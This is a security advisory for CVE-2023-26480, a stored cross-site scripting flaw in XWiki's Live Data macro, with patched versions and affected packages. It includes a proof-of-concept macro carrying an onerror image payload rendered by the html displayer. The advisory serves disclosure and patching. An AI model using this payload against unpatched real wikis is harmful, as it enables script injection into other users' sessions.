GHSA-32fq-m2q5-h83g

Advisory Details

### Impact
A user without script rights can introduce a stored XSS by using the Live Data macro.

For instance:

```
{{liveData id="movies" properties="title,description"}}
{
"data": {
"count": 1,
"entries": [
{
"title": "Meet John Doe",
"url": "https://www.imdb.com/title/tt0033891/",
"description": "<img onerror='alert(1)' src='foo' />"
}
]
},
"meta": {
"propertyDescriptors": [
{
"id": "title",
"name": "Title",
"visible": true,
"displayer": {"id": "link", "propertyHref": "url"}
},
{
"id": "description",
"name": "Description",
"visible": true,
"displayer": "html"
}
]
}
}
{{/liveData}}
```

### Patches
This has been patched in XWiki 14.9, 14.4.7, and 13.10.10.

### Workarounds
No known workaround.

### References
https://jira.xwiki.org/browse/XWIKI-20143

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira](http://jira.xwiki.org/)
* Email us at [Security ML](mailto:[email protected])

Affected Packages

Maven org.xwiki.platform:xwiki-platform-livedata-macro

Affected versions: 12.10 (fixed in 13.10.10)

Maven org.xwiki.platform:xwiki-platform-livedata-macro

Affected versions: 14.0 (fixed in 14.4.7)

Maven org.xwiki.platform:xwiki-platform-livedata-macro

Affected versions: 14.5 (fixed in 14.9)

Related CVEs

CVE-2023-26480

XWiki-Platform vulnerable to stored Cross-site Scripting via the HTML displayer in Live Data

Advisory Details

Affected Packages

Related CVEs

Key Information

Dataset